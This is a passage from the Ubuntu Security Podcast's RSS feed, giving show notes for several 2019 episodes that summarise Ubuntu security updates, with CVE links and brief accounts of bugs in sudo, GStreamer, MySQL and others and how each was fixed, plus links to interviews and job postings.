<li><a href="https://ubuntu.com/security/CVE-2019-9718">CVE-2019-9718</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11339">CVE-2019-11339</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11338">CVE-2019-11338</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15822">CVE-2018-15822</a></li>
</ul>
</li>
<li>CPU DoS in Matroska and HTML subtitle decoding</li>
<li>Various issues discovered by Google&rsquo;s oss-fuzz project:
<ul>
<li>2 x OOB read found by Google&rsquo;s clusterfuzz / oss-fuzz project in MPEG-4 decoder</li>
<li>NULL pointer dereference and OOB read in HEVC decoder</li>
</ul>
</li>
<li>Assertion failure for missing audio packet size in FLV encoder</li>
</ul>
<h3 id="usn-3968-1-sudo-vulnerabilities">[<a href="https://usn.ubuntu.com/3968-1/">USN-3968-1</a>] Sudo vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-1000368">CVE-2017-1000368</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-7076">CVE-2016-7076</a></li>
</ul>
</li>
<li>Fails to properly parse /proc/PID/stat - this is used to determine the
controlling tty - this name could contain newlines - sudo would only read
one line of input and so would get a truncated name - when sudo is used
with SELinux this allows to confuse sudo as to where the destination for
stdout / stderr and so cause sudo to overwrite and arbitrary file by
creating a symlink from the supposed tty to the destination file.</li>
<li>Fixed by ensuring to parse the full name including any newlines</li>
<li>sudo contains the ability to restrict users with sudo access to running
further commands via the NOEXEC tag
<ul>
<li>Does this by LD_PRELOAD to replace exec() and other functions with
versions that return an error</li>
<li>wordexp() performs shell expansion on a string and so can contain shell
directives to run a command and get the output $(foo) - this can run
commands and so would not be stopped by LD_PRELOAD lib - so a user can
run a binary which does wordexp() they could bypass this restriction</li>
<li>Fixed by adding wordexp() to the LD_PRELOAD wrapper AND by adding a
seccomp filter to stop all execve() entirely</li>
</ul>
</li>
</ul>
<h3 id="usn-3969-1-usn-3969-2-wpa-supplicant-and-hostapd-vulnerability">[<a href="https://usn.ubuntu.com/3969-1/">USN-3969-1</a>, USN-3969-2] wpa_supplicant and hostapd vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM, Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11555">CVE-2019-11555</a></li>
</ul>
</li>
<li>Possible NULL pointer dereference if an attacker could construct out of
sequence EAP message fragments</li>
<li>Fixed by validating and rejecting invalid fragments on both the peer and
server side</li>
</ul>
<h3 id="usn-3970-1-ghostscript-vulnerability">[<a href="https://usn.ubuntu.com/3970-1/">USN-3970-1</a>] Ghostscript vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3839">CVE-2019-3839</a></li>
</ul>
</li>
<li>Follow up to <a href="https://ubuntu.com/security/CVE-2019-6116">CVE-2019-6116</a> (<a href="https://ubuntusecuritypodcast.org/episode-18/">Episode 18</a>)
<ul>
<li>GS sandbox allowed access to system operators which allowed arbitrary code execution</li>
<li>Missed some protections for pdf related operations which could also allow code execution</li>
</ul>
</li>
</ul>
<h3 id="usn-3971-1-monit-vulnerabilities">[<a href="https://usn.ubuntu.com/3971-1/">USN-3971-1</a>] Monit vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11455">CVE-2019-11455</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11454">CVE-2019-11454</a></li>
</ul>
</li>
<li>Buffer over-read when decoding URLs could allow a remote authenticated
attacker to read other memory - information disclosure but could also
cause a crash via reading from an invalid memory location</li>
<li>Persistent XSS in decoding Authorization header for HTTP Basic
Authorization could allow an unauthenticated remote attacker to inject
arbitrary JavaScript in the _viewlog operation - fixed by properly
escaping this data</li>
</ul>
<h3 id="usn-3956-2-bind-vulnerability">[<a href="https://usn.ubuntu.com/3956-2/">USN-3956-2</a>] Bind vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-5743">CVE-2018-5743</a></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-29/">Episode 29</a> covered for standard support releases - now fixed in ESM</li>
</ul>
<h2 id="discussion-with-joe-mcmanus-about-malicious-dockerhub-images-and-git-repo-takeover-ransoms">Discussion with Joe McManus about malicious DockerHub images and Git repo takeover ransoms</h2>
<ul>
<li><a href="https://threatpost.com/malicious-docker-containers-earn-crypto-miners-90000/132816/">https://threatpost.com/malicious-docker-containers-earn-crypto-miners-90000/132816/</a></li>
<li><a href="https://www.zdnet.com/article/a-hacker-is-wiping-git-repositories-and-asking-for-a-ransom/">https://www.zdnet.com/article/a-hacker-is-wiping-git-repositories-and-asking-for-a-ransom/</a></li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1550997">https://boards.greenhouse.io/canonical/jobs/1550997</a></li>
</ul>
<h4 id="security-certifications-engineer">Security Certifications Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1660658">https://boards.greenhouse.io/canonical/jobs/1660658</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E031.mp3" length="21345723" type="audio/mpeg" /><itunes:duration>22:14</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 30
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-30/</link>
          <pubDate>Mon, 06 May 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E030.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 30</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        Fixes for 19 different vulnerabilities across MySQL, Dovecot, Memcached and others, plus we talk to Joe McManus about the recent iLnkP2P IoT hack and the compromise of DockerHub's credentials database and more.
        
        ]]></itunes:subtitle>
        <itunes:summary>Fixes for 19 different vulnerabilities across MySQL, Dovecot, Memcached and others, plus we talk to Joe McManus about the recent iLnkP2P IoT hack and the compromise of DockerHub's credentials database and more.</itunes:summary>
        <description>Fixes for 19 different vulnerabilities across MySQL, Dovecot, Memcached and others, plus we talk to Joe McManus about the recent iLnkP2P IoT hack and the compromise of DockerHub's credentials database and more.</description>
        <googleplay:description>Fixes for 19 different vulnerabilities across MySQL, Dovecot, Memcached and others, plus we talk to Joe McManus about the recent iLnkP2P IoT hack and the compromise of DockerHub's credentials database and more.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Fixes for 19 different vulnerabilities across MySQL, Dovecot, Memcached and others, plus we talk to Joe McManus about the recent iLnkP2P IoT hack and the compromise of DockerHub&rsquo;s credentials database and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>19 unique CVEs addressed</p>
<h3 id="usn-3957-1-mysql-vulnerabilities">[<a href="https://usn.ubuntu.com/3957-1/">USN-3957-1</a>] MySQL vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-2683">CVE-2019-2683</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2632">CVE-2019-2632</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2628">CVE-2019-2628</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2627">CVE-2019-2627</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2614">CVE-2019-2614</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2592">CVE-2019-2592</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2581">CVE-2019-2581</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2566">CVE-2019-2566</a></li>
</ul>
</li>
<li>Latest upstream version 5.7.26 includes fixes for 8 different issues including:
<ul>
<li>Unauthenticated remote attacker could gain complete access to all MySQL server data</li>
<li>Multiple versions of privileged attacker could hang / crash MySQL server</li>
</ul>
</li>
</ul>
<h3 id="usn-3958-1-gstreamer-base-plugins-vulnerability">[<a href="https://usn.ubuntu.com/3958-1/">USN-3958-1</a>] GStreamer Base Plugins vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9928">CVE-2019-9928</a></li>
</ul>
</li>
<li>Heap based buffer overflow in RTSP connection parser - could allow a
malicious server to gain remote code execution on the client - session id
can contain attributes separated by semi-colons - would assume when
encountering a semi-colon that this delimits the maximum size of the
session id - however the session id has a maximum size of 512 bytes -
would overflow by using the user-supplied session id length rather than
sticking to the maximum structure length - changed to only parse up to
the maximum size of the structure to ensure we then don&rsquo;t overflow when
copying</li>
</ul>
<h3 id="usn-3959-1-evince-vulnerability">[<a href="https://usn.ubuntu.com/3959-1/">USN-3959-1</a>] Evince vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11459">CVE-2019-11459</a></li>
</ul>
</li>
<li>Failed to check return values when calling functions for libTIFF - these
return the pixel data from an embedded TIFF image - on failure would end
up rendering uninitialised memory rather than the TIFF image - fixed to
check return values and bail out on error</li>
</ul>
<h3 id="usn-3960-1-wavpack-vulnerability">[<a href="https://usn.ubuntu.com/3960-1/">USN-3960-1</a>] WavPack vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11498">CVE-2019-11498</a></li>
</ul>
</li>
<li>Fuzzing via valgrind - found if no sample rate was specified then a stack
declared but uninitialized value would be used - could cause a crash etc
since could be anything - fixed to initialise it to 0 and to check if
still zero before proceeding to process</li>
</ul>
<h3 id="usn-3961-1-dovecot-vulnerabilities">[<a href="https://usn.ubuntu.com/3961-1/">USN-3961-1</a>] Dovecot vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11499">CVE-2019-11499</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11494">CVE-2019-11494</a></li>
</ul>
</li>
<li>Two issues related to authentication in recent versions of dovecot - if
client aborts authentication the serer could crash due to a NULL pointer
dereference, and if using TLS but send an invalid authentication message
could crash as well</li>
</ul>
<h3 id="usn-3962-1-libpng-vulnerability">[<a href="https://usn.ubuntu.com/3962-1/">USN-3962-1</a>] libpng vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-7317">CVE-2019-7317</a></li>
</ul>
</li>
<li>Use after free in png image cleanup - originally was called under
png_safe_execute() - this is an internal function which itself calls
png_image_free() - so after freeing the image would free it a second time
in certain conditions - changed to just call the free function directly
rather than via png_safe_execute()</li>
</ul>
<h3 id="usn-3963-1-memcached-vulnerability">[<a href="https://usn.ubuntu.com/3963-1/">USN-3963-1</a>] Memcached vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11596">CVE-2019-11596</a></li>
</ul>
</li>
<li>Possible NULL pointer dereference via local command interface due to
insufficient checks when parsing input - commands require 4 input tokens
but only checked for 3 (off-by-one) - could allow an attacker with access
to the command interface to crash memcached</li>
</ul>
<h3 id="usn-3953-2-php-vulnerabilities">[<a href="https://usn.ubuntu.com/3953-2/">USN-3953-2</a>] PHP vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Precise ESM, Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11035">CVE-2019-11035</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11034">CVE-2019-11034</a></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-29/">Episode 29</a> covered these for standard supported releases - this update is
for the ESM releases - two bugs in EXIF tag handling</li>
</ul>
<h3 id="usn-3964-1-python-gnupg-vulnerabilities">[<a href="https://usn.ubuntu.com/3964-1/">USN-3964-1</a>] python-gnupg vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-6690">CVE-2019-6690</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12020">CVE-2018-12020</a></li>
</ul>
</li>
<li>Possible to trick gnupg to decrypt ciphertext other than the intended one
when an attacker can control the passphrase to gnupg and the ciphertext
is assumed trusted - this uses the command-interface of gnupg and passes
the passphrase directly to it - along with the ciphertext - so if
attacker includes newlines in the supplied passphrase can then inject
their own ciphertext (or plaintext in the context of encryption) - fixed
to check passphrase does not contain line-feed or carriage return
characters</li>
<li>Possible to trick by including what looks like the return response from
gnupg directly in the filename to be decrypted when using verbose output
mode - fixed by sanitising this filename first</li>
</ul>
<h2 id="discussion-with-joe-mcmanus-about-another-iot-compromise-and-dockerhub">Discussion with Joe McManus about another IoT compromise and DockerHub</h2>
<ul>
<li><a href="https://krebsonsecurity.com/2019/04/p2p-weakness-exposes-millions-of-iot-devices/">https://krebsonsecurity.com/2019/04/p2p-weakness-exposes-millions-of-iot-devices/</a></li>
<li><a href="https://www.zdnet.com/article/over-two-million-iot-devices-vulnerable-because-of-p2p-component-flaws/">https://www.zdnet.com/article/over-two-million-iot-devices-vulnerable-because-of-p2p-component-flaws/</a></li>
<li><a href="https://www.zdnet.com/article/docker-hub-hack-exposed-data-of-190000-users/">https://www.zdnet.com/article/docker-hub-hack-exposed-data-of-190000-users/</a></li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="hiring">Hiring</h3>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1550997">https://boards.greenhouse.io/canonical/jobs/1550997</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E030.mp3" length="19971473" type="audio/mpeg" /><itunes:duration>20:48</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 29
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-29/</link>
          <pubDate>Tue, 30 Apr 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E029.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 29</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at fixes from the past two weeks including BIND, NTFS-3G,
  Dovecot, Pacemaker and more, plus we follow up last episodes IoT security
  discussion with Joe McManus talking about Ubuntu Core. Finally we cover the
  release...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at fixes from the past two weeks including BIND, NTFS-3G,
  Dovecot, Pacemaker and more, plus we follow up last episodes IoT security
  discussion with Joe McManus talking about Ubuntu Core. Finally we cover the
  release of Ubuntu 19.04 Disco Dingo and the transition of Ubuntu 14.04
  Trusty Tahr to Extended Security Maintenance.
  </itunes:summary>
        <description>  This week we look at fixes from the past two weeks including BIND, NTFS-3G,
  Dovecot, Pacemaker and more, plus we follow up last episodes IoT security
  discussion with Joe McManus talking about Ubuntu Core. Finally we cover the
  release of Ubuntu 19.04 Disco Dingo and the transition of Ubuntu 14.04
  Trusty Tahr to Extended Security Maintenance.
  </description>
        <googleplay:description>  This week we look at fixes from the past two weeks including BIND, NTFS-3G,
  Dovecot, Pacemaker and more, plus we follow up last episodes IoT security
  discussion with Joe McManus talking about Ubuntu Core. Finally we cover the
  release of Ubuntu 19.04 Disco Dingo and the transition of Ubuntu 14.04
  Trusty Tahr to Extended Security Maintenance.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at fixes from the past two weeks including BIND, NTFS-3G,
Dovecot, Pacemaker and more, plus we follow up last episodes IoT security
discussion with Joe McManus talking about Ubuntu Core. Finally we cover the
release of Ubuntu 19.04 Disco Dingo and the transition of Ubuntu 14.04
Trusty Tahr to Extended Security Maintenance.</p>
<h2 id="these-past-two-weeks-in-ubuntu-security-updates">These past two weeks in Ubuntu Security Updates</h2>
<p>53 unique CVEs addressed</p>
<h3 id="usn-3947-1-usn-3947-2-libxslt-vulnerability">[<a href="https://usn.ubuntu.com/3947-1/">USN-3947-1</a>, USN-3947-2] Libxslt vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11068">CVE-2019-11068</a></li>
</ul>
</li>
<li>Library to transform XML via XML definitions</li>
<li>Includes a security framework since XSLT can define operations to
fetch/read/write files and resources etc</li>
<li>Various functions would return 0 if an operation is not allowed by the
framework which was checked for and correctly disallowed - BUT they could
also return -1 on error (say from a potentially bad URL) which would not
be caught and so then would proceed and would fetch from the URL in
question thereby violating the security policy</li>
<li>Fixed to also check for error codes on handle the same as an explicit
policy violation</li>
</ul>
<h3 id="usn-3948-1-webkitgtk-plus-vulnerabilities">[<a href="https://usn.ubuntu.com/3948-1/">USN-3948-1</a>] WebKitGTK+ vulnerabilities</h3>
<ul>
<li>14 CVEs addressed in Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-8563">CVE-2019-8563</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8559">CVE-2019-8559</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8558">CVE-2019-8558</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8551">CVE-2019-8551</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8544">CVE-2019-8544</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8536">CVE-2019-8536</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8535">CVE-2019-8535</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8524">CVE-2019-8524</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8523">CVE-2019-8523</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8518">CVE-2019-8518</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8506">CVE-2019-8506</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8375">CVE-2019-8375</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-6251">CVE-2019-6251</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11070">CVE-2019-11070</a></li>
</ul>
</li>
<li>Wide mix of issues fixed including XSS and DoS attacks or possible
arbitrary code execution if visiting a malicious website</li>
</ul>
<h3 id="usn-3949-1-openjdk-11-vulnerability">[<a href="https://usn.ubuntu.com/3949-1/">USN-3949-1</a>] OpenJDK 11 vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-2422">CVE-2019-2422</a></li>
</ul>
</li>
<li>Backport of openjdk-11 from Disco to Bionic, includes a minor security
fix to memory disclosure vulnerablity which could enable an attacker to
bypass sandbox</li>
</ul>
<h3 id="usn-3918-4-firefox-regressions">[<a href="https://usn.ubuntu.com/3918-4/">USN-3918-4</a>] Firefox regressions</h3>
<ul>
<li>17 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9803">CVE-2019-9803</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9793">CVE-2019-9793</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9809">CVE-2019-9809</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9808">CVE-2019-9808</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9807">CVE-2019-9807</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9806">CVE-2019-9806</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9805">CVE-2019-9805</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9802">CVE-2019-9802</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9799">CVE-2019-9799</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9797">CVE-2019-9797</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9796">CVE-2019-9796</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9795">CVE-2019-9795</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9792">CVE-2019-9792</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9791">CVE-2019-9791</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9790">CVE-2019-9790</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9789">CVE-2019-9789</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9788">CVE-2019-9788</a></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-26/">Episode 26</a> covered 66.0.2 regression - this is now 66.0.3 to fix further
regressions in keyboard handling as discussed previously</li>
</ul>
<h3 id="usn-3914-2-ntfs-3g-update">[<a href="https://usn.ubuntu.com/3914-2/">USN-3914-2</a>] NTFS-3G update</h3>
<ul>
<li>Affecting Xenial, Bionic, Cosmic</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-25/">Episode 25</a> covered ntfs-3g update for possible heap buffer overflow
<ul>
<li>As was setuid root this could possibly be used for root privilege
escalation</li>
</ul>
</li>
<li>This update removes setuid root to additionally harden ntfs-3g so that
any future vulnerablilites can&rsquo;t be used for privilege escalation</li>
</ul>
<h3 id="usn-3950-1-znc-vulnerability">[<a href="https://usn.ubuntu.com/3950-1/">USN-3950-1</a>] ZNC vulnerability</h3>
<ul>
<li>1 CVEs addressed in Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9917">CVE-2019-9917</a></li>
</ul>
</li>
<li>crash -&gt; DoS due to improper handling of character encoding - if a remote
user specified an invalid encoding it could cause znc to crash</li>
<li>Fixed to fallback to utf-8 if unknown encoding specified</li>
</ul>
<h3 id="usn-3951-1-dovecot-vulnerability">[<a href="https://usn.ubuntu.com/3951-1/">USN-3951-1</a>] Dovecot vulnerability</h3>
<ul>
<li>1 CVEs addressed in Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-10691">CVE-2019-10691</a></li>
</ul>
</li>
<li>Only affects Dovecot 2.3 and hence only Cosmic, Disco, Eoan etc</li>
<li>Improper handling of invalid utf-8 username in JSON encoding could cause
the authentication service to crash</li>
</ul>
<h3 id="usn-3952-1-pacemaker-vulnerabilities">[<a href="https://usn.ubuntu.com/3952-1/">USN-3952-1</a>] Pacemaker vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3885">CVE-2019-3885</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16878">CVE-2018-16878</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16877">CVE-2018-16877</a></li>
</ul>
</li>
<li>Cluster resource manager - high availability and load balancing for OpenStack</li>
<li>All discovered by Jan Pokorný - local attacker could possibly escalate
privileges or cause a denial of service or to cause sensitive information
to be leaked to system logs</li>
</ul>
<h3 id="usn-3953-1-php-vulnerabilities">[<a href="https://usn.ubuntu.com/3953-1/">USN-3953-1</a>] PHP vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11035">CVE-2019-11035</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11034">CVE-2019-11034</a></li>
</ul>
</li>
<li>php7.2 and php7.0</li>
<li>Buffer over-read when processing certain EXIF tags - possible information
disclosure or crash -&gt; DoS</li>
</ul>
<h3 id="usn-3922-2-usn-3922-3-php-vulnerabilities">[<a href="https://usn.ubuntu.com/3922-2/">USN-3922-2</a>, USN-3922-3] PHP vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Precise ESM, Trusty
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9641">CVE-2019-9641</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9640">CVE-2019-9640</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9639">CVE-2019-9639</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9638">CVE-2019-9638</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9637">CVE-2019-9637</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9675">CVE-2019-9675</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9022">CVE-2019-9022</a></li>
</ul>
</li>
<li>Most covered back in <a href="https://ubuntusecuritypodcast.org/episode-26/">Episode 26</a></li>
</ul>
<h3 id="usn-3936-2-advancecomp-vulnerability">[<a href="https://usn.ubuntu.com/3936-2/">USN-3936-2</a>] AdvanceCOMP vulnerability</h3>
<ul>
<li>1 CVEs addressed in Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9210">CVE-2019-9210</a></li>
</ul>
</li>
<li>Corresponding update for Disco - covered in <a href="https://ubuntusecuritypodcast.org/episode-27/">Episode 27</a></li>
</ul>
<h3 id="usn-3954-1-freeradius-vulnerabilities">[<a href="https://usn.ubuntu.com/3954-1/">USN-3954-1</a>] FreeRADIUS vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11235">CVE-2019-11235</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11234">CVE-2019-11234</a></li>
</ul>
</li>
<li>2 possible &ldquo;Dragonblood&rdquo; authentication bypass issues - mentioned back in
<a href="https://ubuntusecuritypodcast.org/episode-28/">Episode 28</a> in the context of wpa_supplicant and hostapd - similar issue
for FreeRADIUS</li>
</ul>
<h3 id="usn-3955-1-tcpflow-vulnerabilities">[<a href="https://usn.ubuntu.com/3955-1/">USN-3955-1</a>] tcpflow vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-18409">CVE-2018-18409</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14938">CVE-2018-14938</a></li>
</ul>
</li>
<li>Stack based buffer overflow and an integer overflow -&gt; usual effects
(crash -&gt; DoS / information disclosure)</li>
</ul>
<h3 id="usn-3956-1-bind-vulnerability">[<a href="https://usn.ubuntu.com/3956-1/">USN-3956-1</a>] Bind vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-5743">CVE-2018-5743</a></li>
</ul>
</li>
<li>DoS - possible to bypass bind&rsquo;s limits on simultaneous TCP clients and so
cause a DoS via excessive resource usage</li>
</ul>
<h2 id="iot-security-follow-up-with-joe-mcmanus">IoT Security follow-up with Joe McManus</h2>
<ul>
<li>Alex and Joe follow up on last episode&rsquo;s conversation about IoT and in
particular talk about Ubuntu Core and how this has been engineered to
address many of these common IoT security design and implementation flaws</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-19-dot-04-disco-dingo-released">Ubuntu 19.04 Disco Dingo Released</h3>
<ul>
<li>Released on Thursday 18th April</li>
<li>Officially supported by Canonical for 9 months - with security fixes for
packages in main by the security team</li>
</ul>
<h3 id="ubuntu-14-dot-04-trusty-tahr-transitions-to-extended-security-maintenance">Ubuntu 14.04 Trusty Tahr transitions to Extended Security Maintenance</h3>
<ul>
<li>Standard support period concluded on Thursday 25th April</li>
<li>Users are encouraged to upgrade to our latest LTS release 18.04 via 16.04</li>
<li>Extended security maintenance is now available via Ubuntu Advantage</li>
<li><a href="https://blog.ubuntu.com/2019/02/05/ubuntu-14-04-trusty-tahr">https://blog.ubuntu.com/2019/02/05/ubuntu-14-04-trusty-tahr</a></li>
<li><a href="https://www.ubuntu.com/esm">https://www.ubuntu.com/esm</a></li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-generalist">Ubuntu Security Generalist</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1548812">https://boards.greenhouse.io/canonical/jobs/1548812</a></li>
</ul>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
